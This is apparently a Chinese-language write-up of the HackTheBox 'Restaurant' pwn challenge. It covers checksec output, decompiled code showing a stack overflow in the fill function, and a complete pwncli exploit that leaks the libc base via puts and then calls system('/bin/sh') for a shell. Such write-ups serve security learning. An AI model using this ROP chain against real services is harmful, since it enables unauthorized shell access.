经典的栈溢出基础题
analysis:
checksec:没有Canary和PIE
pwn_restaurant ➤ checksec restaurant
[*] '/mnt/c/Users/selph/Downloads/HTB/pwn/Restaurant/pwn_restaurant/restaurant'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
main:给了2个选择,其中选择1,进入fill函数存在可控输入
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v3; // ecx
int v4; // r8d
int v5; // r9d
int v6; // edx
int v7; // ecx
int v8; // r8d
int v9; // r9d
int v10; // ecx
int v11; // r8d
int v12; // r9d
int v14; // [rsp+Ch] [rbp-4h] BYREF
setup(argc, argv, envp);
color((unsigned int)&unk_401250, (unsigned int)"cyan", (unsigned int)"bold", v3, v4, v5);
color((unsigned int)"\nWhat would you like?", (unsigned int)"green", v6, v7, v8, v9);
printf("\n1. Fill my dish.\n2. Drink something\n> ");
__isoc99_scanf(&word_401226, &v14);
if ( v14 == 1 )
{
fill();
}
else
{
if ( v14 != 2 )
{
color((unsigned int)"\nInvalid option! Exiting..\n", (unsigned int)"red", (unsigned int)"bold", v10, v11, v12);
exit(261);
}
drink();
}
return 0;
}
fill:标准的栈溢出,直接写rop即可
int __fastcall fill(__int64 a1, __int64 a2, __int64 a3, int a4, int a5, int a6)
{
int v6; // ecx
int v7; // r8d
int v8; // r9d
__int64 buf[4]; // [rsp+0h] [rbp-20h] BYREF
memset(buf, 0, sizeof(buf));
color(
(unsigned int)"\nYou can add these ingredients to your dish:",
(unsigned int)"green",
(unsigned int)"bold",
a4,
a5,
a6);
puts(a12);
color((unsigned int)"You can also order something else.\n> ", (unsigned int)"green", (unsigned int)"bold", v6, v7, v8);
read(0, buf, 0x400uLL);
return printf("\nEnjoy your %s", (const char *)buf);
}
exploit:
思路:
- 第一次栈溢出写rop打印libc地址,然后返回漏洞函数触发第二次栈溢出
- 第二次栈溢出调用system函数拿shell读取flag
#!/usr/bin/env python3
from pwncli import *
cli_script()
set_remote_libc('libc.so.6')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
sla(b"> ",b"1")
rop = ROP(elf)
rop.puts(elf.got.puts)
rop.raw(0x400e4a)
payload = cyclic(0x28) + rop.chain()
sla(b"> ",payload)
ru(cyclic(0x28))
leak = rl()[-7:-1]
libc.address = unpack(leak,'all') - libc.sym.puts
print(hex(libc.address))
rop = ROP([elf,libc])
rop.raw(rop.find_gadget(['ret']))
rop.system(next(libc.search(b"/bin/sh")))
payload = cyclic(0x28) + rop.chain()
sla(b"> ",payload)
ia()
summary:
- 经典的栈溢出基础题目